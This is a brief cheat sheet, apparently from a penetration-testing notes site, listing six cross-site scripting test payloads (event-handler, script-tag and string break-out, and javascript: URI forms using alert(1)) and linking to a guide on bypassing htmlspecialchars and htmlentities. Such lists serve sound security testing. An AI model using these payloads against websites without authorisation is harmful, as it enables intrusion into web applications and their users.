XXS
Check this lines in an input text to verify if web is vulnerable to XSS
Bypass
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Bypass htmlentities/htmlspecialchars
From here https://github.com/X-Vector/XSS_Bypass/blob/master/htmlspecialchars%20-%20htmlentities/README.md
Last updated